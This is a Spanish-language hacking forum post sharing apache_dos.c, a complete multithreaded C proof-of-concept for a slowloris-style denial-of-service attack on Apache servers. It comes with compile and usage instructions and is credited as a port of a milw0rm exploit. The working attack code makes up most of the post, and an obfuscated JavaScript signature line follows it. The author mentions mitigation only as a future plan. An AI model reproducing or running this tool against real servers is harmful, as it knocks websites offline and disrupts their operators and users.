apache_dos.c - Apache D.O.S proof-of-concept
Posted by C1c4Tr1Z
Reverse DNS Online |
apache_dos.c - Apache D.O.S proof-of-concept seven months ago | Admin Registered: last year Posts: 172 |
Hice un pequeño código, basado en el publicado por evilrabbi en milw0rm.com (afiliado!). Esta echo en C y, a diferencia de el mencionado, usa hilos POSIX. Dentro de poco voy a tratar de encontrar una forma temporal de mitigar este tipo de ataques. Si bien ESTE poc no aniquila el servidor httpd solamente lo paraliza mientras se mantenga dicha sesión y en algunos casos el servidor responde con un error.
He aquí la aplicación:
EDIT: hice varios cambios, pero hasta el momento me cuesta replicar el tipo de ataque realizado por RSnake.
---
[voodoo-labs.org] {hacking people, voodoo people} ~ Ninja coder
Edited 4 time(s). Last edit was seven months ago by C1c4Tr1Z.
He aquí la aplicación:
Language: C/*** * apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org> * C version of the D.O.S proof-of-concept by evilrabbi (http://www.milw0rm.com/exploits/8991) * voodoo-labs 2009 (http://voodoo-labs.org) & undersecurity (http://foro.undersecurity.net) * compile: gcc -o apache_dos apache_dos.c -lpthread ***/ #include <time.h> #include <stdio.h> #include <netdb.h> #include <getopt.h> #include <string.h> #include <stdlib.h> #include <pthread.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 80 #define PTHREADS 30 #define UA "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) "\ "Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.11" #define ERROR(x) do{if(x!=NULL)printf("[-]%s\n",x);exit(-1);}while(0); #define GET "GET / HTTP/1.1\r\n"\ "Host: %s\r\n"\ "User-Agent: %s\r\n"\ "Content-Length: %d\r\n"\ "X-a: %d\r\n" #define X "X-a: b\r\n" static int port=PORT; void *sendHeaders(const char *address){ int sock; struct sockaddr_in sockaddr; struct hostent *host_s; if((host_s=gethostbyname(address))==NULL){ perror("[-]gethostbyname()"); pthread_exit(0); } srand(time(NULL)); memset(&sockaddr, 0, sizeof(struct sockaddr)); sockaddr.sin_port=htons(port); sockaddr.sin_family=AF_INET; memcpy(&sockaddr.sin_addr, host_s->h_addr, host_s->h_length); if((sock=socket(AF_INET, SOCK_STREAM, 0x06))!=-1){ if((connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))!=-1){ dprintf(sock, GET, address, UA, rand()%10000, rand()%1000); while((send(sock, X, strlen(X), 0))!=-1){ /** * you can change the interval time * between each request (def: 10s.) **/ sleep(2); } }else{ perror("[-]connect()"); pthread_exit(0); } close(sock); }else{ perror("[-]socket()"); pthread_exit(0); } pthread_exit(0); } int main(int argc, char *argv[]){ int opt, thread, thread_n=PTHREADS; char *server, *ptr; opterr=0; while((opt=getopt(argc, argv, "t:n:h"))!=-1){ switch(opt){ case('t'): server=(char*)malloc(strlen(optarg)); memset(server, 0, sizeof(server)); if((ptr=strchr(optarg, ':'))!=NULL){ *ptr++='\0'; port=atoi(ptr); } strncpy(server, optarg, strlen(optarg)); break; case('n'): thread_n=atoi(optarg); break; case('?'): printf("[-]option requires an argument (-%c).\n",optopt); case('h'): default: printf( "[+]apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org>\n" "[+]usage: %s [-n threads] -t <target>[:port]\n", argv[0]); ERROR(NULL); } } printf("[+]target: %s (%d)\n", server, port); printf("[+]useragent: %s\n", UA); while(1){ pthread_t pthreads[thread_n]; printf("[+]number of threads: %d\n", thread_n); for(thread=0;thread<thread_n;thread++){ if(pthread_create(&pthreads[thread], NULL, (void*)sendHeaders, (void*)server)!=0){ ERROR("couldn't create a thread."); } } for(thread=0;thread<thread_n;thread++){ pthread_join(pthreads[thread], NULL); } } return(0); }
EDIT: hice varios cambios, pero hasta el momento me cuesta replicar el tipo de ataque realizado por RSnake.
---
[voodoo-labs.org] {hacking people, voodoo people} ~ Ninja coder
Language: Javascript(this)[(æ=[]+[([]<[]),(([]|[])>(+~[]))],æ[-~æ]+æ[-~-~æ]+æ[(-~-~æ)+(-~-~æ)]+æ[+~-~+~+~+~((-~-~æ)<<(-~-~æ))]+æ[-~-~-~æ+-~-~-~æ])](æ<<æ)
Edited 4 time(s). Last edit was seven months ago by C1c4Tr1Z.
|
Re: apache_dos.c - Apache D.O.S proof-of-concept seven months ago | Registered: last year Posts: 214 |
|
Re: apache_dos.c - Apache D.O.S proof-of-concept six months ago | Registered: six months ago Posts: 5 |
Sorry, only registered users may post in this forum.
Online Users
Guests:
23
Record Number of Users:
9
on September 07, 2009
Record Number of Guests:
66
on November 19, 2009
. - Forum Statistics
Global
Topics: 1,912, Posts: 5,733, Users: 725.
Our newest member sayadeejay.
This forum
Topics: 114, Posts: 509.
Comunidades Afiliadas
Guason Blog || KernelError || Milworm || Darkc0de || Voodoo-Labs || El-Guille || N3t-Datagrams || Shell-Storm || 0verl0ad || Xssed || GnuChile || HackxCrack.es || Underground México || Hispabyte ||
Ex New-Bytes Actual Undersecurity , Una Misma Alma La Misma Razon
Guason Blog || KernelError || Milworm || Darkc0de || Voodoo-Labs || El-Guille || N3t-Datagrams || Shell-Storm || 0verl0ad || Xssed || GnuChile || HackxCrack.es || Underground México || Hispabyte ||
Ex New-Bytes Actual Undersecurity , Una Misma Alma La Misma Razon